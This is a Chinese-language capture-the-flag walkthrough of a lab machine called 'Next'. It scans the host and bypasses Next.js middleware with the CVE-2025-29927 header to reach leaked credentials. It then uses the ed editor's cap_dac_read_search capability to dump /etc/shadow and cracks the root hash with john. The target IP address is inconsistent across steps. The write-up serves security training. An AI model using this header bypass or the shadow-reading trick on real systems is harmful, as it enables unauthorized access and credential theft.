Next

靶机说明

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:05 CST
Nmap scan report for 192.168.2.1
Host is up (0.00071s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00036s latency).
MAC Address: 08:00:27:F8:17:C0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.13
Host is up (0.00053s latency).
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

靶机IP:192.168.2.70

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.13                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:15 CST
Nmap scan report for 192.168.2.13
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

开放端口:22、80、3000

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:16 CST
Nmap scan report for 192.168.2.13
Host is up (0.00049s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: Next.js
|     ETag: "wvpz46leg16iz"
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 8460
|     Vary: Accept-Encoding
|     Date: Sun, 14 Sep 2025 15:16:23 GMT
|     Connection: close
|     <!DOCTYPE html><html><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title class="jsx-1eb51da0ac6ad36f">maze-sec | Cybersecurity Research</title><link rel="icon" href="/favicon.ico" class="jsx-1eb51da0ac6ad36f"/><meta name="hint" content="Authorized access at a secret endpoint. Try 2025." class="jsx-1eb51da0ac6ad36f"/><meta name="next-head-count" content="5"/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-6805d7a71c2d770b.js" defer=""></script><scr
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     Allow: GET
|     Allow: HEAD
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     X-Powered-By: Next.js
|     Content-Type: text/html; charset=utf-8
|     Vary: Accept-Encoding
|     Date: Sun, 14 Sep 2025 15:16:23 GMT
|     Connection: close
|     <!DOCTYPE html><html><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>405: Method Not Allowed</title><meta name="next-head-count" content="3"/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-6805d7a71c2d770b.js" defer=""></script><script src="/_next/static/chunks/main-c396fbccb3dec4e9.js" defer=""></script><script src="/_next/static/chunks/pages/_app-dc14f8483464b560.js" defer=""></scri
|   Help, NCP: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.31 seconds
  1. 22端口,ssh服务
  2. 80端口,http服务
  3. 3000端口,ppp服务,可能是node.js应用

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sU --top-ports 100 192.168.2.13                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:17 CST
Nmap scan report for 192.168.2.13
Host is up (0.00034s latency).
All 100 scanned ports on 192.168.2.13 are in ignored states.
Not shown: 60 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response)
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.53 seconds

没有开放的udp端口

4.脚本漏洞扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --script=vuln -p22,80,3000 192.168.2.13              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:19 CST
Nmap scan report for 192.168.2.13
Host is up (0.00032s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
3000/tcp open  ppp
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.34 seconds

没有新的信息

二、WEB渗透

1、80端口

访问80端口

1
2
3
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# curl http://192.168.2.13                                                                    
No matter where life takes you, keep going NEXT.

只访问了一句话,提示可能与next.js有关

2、3000端口

访问3000端口

1
2
3
4
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# curl http://192.168.2.13:3000
<!DOCTYPE html><html><head>
<meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title class="jsx-1eb51da0ac6ad36f">maze-sec | Cybersecurity Research</title><link rel="icon" href="/favicon.ico" class="jsx-1eb51da0ac6ad36f"/><meta name="hint" content="Authorized access at a secret endpoint. Try 2025." class="jsx-1eb51da0ac6ad36f"/>

包含关键信息:

  • 使用next.js框架
  • 提示:Authorized access at a secret endpoint. Try 2025.

1、目录扫描

1
2
3
4
5
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# gobuster dir -u http://192.168.2.13:3000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/admin                (Status: 307) [Size: 18] [--> /secret-login-2025]
...

找到路径/admin重定向到了/secret-login-2025

三、Node.js框架漏洞

访问/secret-login-2025返回一个登录界面

经过测试,发现该版本的next.js存在cve-2025-29927漏洞

1、漏洞原理

CVE-2025-29927是Next.js框架中存在的一个高危中间件逻辑绕过漏洞,允许攻击者通过构造特定HTTP请求头x-middleware-subrequest: middleware,绕过中间件的安全控制逻辑(如身份验证、路径重写、CSP防护等)

相关参考:

2、漏洞利用

1.绕过中间件访问登录页面

使用漏洞绕过中间件限制:

1
2
3
4
5
┌──(kali㉿kali)-[/mnt/hgfs/gx/x]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/secret-login-2025
<!DOCTYPE html><html>...
<title class="jsx-51c627a66454ffc6">Restricted Login | maze-sec</title>
...

成功获取到完整的登录页面。

2.分析前端代码获取凭据

下载并分析登录页面的 JavaScript 文件:

1
2
3
4
5
6
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/_next/static/chunks/pages/secret-login-2025-2d3e58ee9a68cbe4.js -o login.js

┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ cat login.js | grep password
...console.log("Login attempt:",{username:r,password:c})...

代码显示登录信息会通过 console.log 输出,成功登录后会跳转到 /admin/dashboard

3.访问管理面板获取日志

继续使用漏洞访问管理面板:

1
2
3
4
5
6
┌──(kali㉿kali)-[/mnt/hgfs/gx/x]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/admin/dashboard
...
<h3 class="jsx-11905641757d090">System Logs</h3>
<p class="jsx-11905641757d090">Review system activity (contains sensitive data).</p>
...

发现系统日志功能,直接访问日志 API:

1
2
3
4
5
6
┌──(kali㉿kali)-[/mnt/hgfs/gx/x]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/api/logs | grep password
...
"2025-09-12 10:07:12 - Successful login: c1trus with password MazeSecure@2025!"
"2025-09-12 10:20:09 - Database backup: user=c1trus_db_admin, pass=MazeDB2025!"
...

成功获取到 SSH 登录凭据:

  • 用户名:c1trus
  • 密码:MazeSecure@2025!

四、获取c1trus权限

直接使用获取到的凭证进行登录

1
2
3
4
5
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# ssh c1trus@192.168.2.13     
...
$ id
uid=1000(c1trus) gid=1000(c1trus) groups=1000(c1trus)

五、权限提升

1、查看sudo权限

1
2
3
4
5
6
$ sudo -l
Matching Defaults entries for c1trus on Next:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User c1trus may run the following commands on Next:
    (ALL) NOPASSWD: /usr/bin/whoami

只能无密码执行 whoami

2、查看suid文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

未发现特殊的文件

3、查看具有特殊权限的文件

1
2
3
4
$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ed = cap_dac_read_search+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

发现/usr/bin/ed具有cap_dac_read_search+ep能力,这个能力允许程序绕过文件读取权限检查。

4、利用 ed 读取敏感文件

ed 编辑器利用原理

ed 是一个行编辑器,当它具有 cap_dac_read_search 能力时,可以读取任何文件,无视文件权限。可以通过管道命令实现自动化读取。

读取/etc/passwd

1
2
3
4
5
$ echo ",p\nq" | /usr/bin/ed /etc/shadow
941
root:$6$OkwDvceFhTabwVGQ$noxBcQ9o14G0cTyNdu9EBOoq3AmB660NS5Usr83oGcJNjxezZrwA/5ME3smPLzoizro5LRFqFKQlbO42l4rvt1:20343:0:99999:7:::
...
c1trus:$6$p/7V81X3jW.t4UVk$p0QwkfnPmVwKd5G45ABhShw/bdysk8cCAOF7a2AU/rKcpjFbmeGEN2Wq6AyXcLLgq3ldpBMWDg7VSupIzy7w4/:20343:0:99999:7:::

命令解释:

  • ,p - 打印所有行(从第一行到最后一行)
  • q - 退出编辑器

5、密码爆破

root用户的哈希值写入到文件

1
2
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# echo 'root:$6$OkwDvceFhTabwVGQ$noxBcQ9o14G0cTyNdu9EBOoq3AmB660NS5Usr83oGcJNjxezZrwA/5ME3smPLzoizro5LRFqFKQlbO42l4rvt1' > hash

使用john进行爆破

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bisrock          (root)     
1g 0:00:00:21 DONE (2025-09-15 23:09) 0.04601g/s 2733p/s 2733c/s 2733C/s blueboy1..062906
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功找打凭证:root:bisrock

6、获取root权限

1
2
3
4
$ su root
Password: bisrock
root@Next:/home/c1trus# id
uid=0(root) gid=0(root) groups=0(root)

六、获取FLAG

1
2
3
root@Next:/home/c1trus# cat /home/c1trus/user.txt /root/root.txt 
flag{user_d0cab90d8d20d57e2f2b9be52f7dd25d}
flag{root_8812662dcf3e5db0247c0f85909363fc}
Maze-sec
#john #Node.js #CVE-2025-29927 #ed编辑器
Next
http://miao-sec.github.io/Maze-sec/Next/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO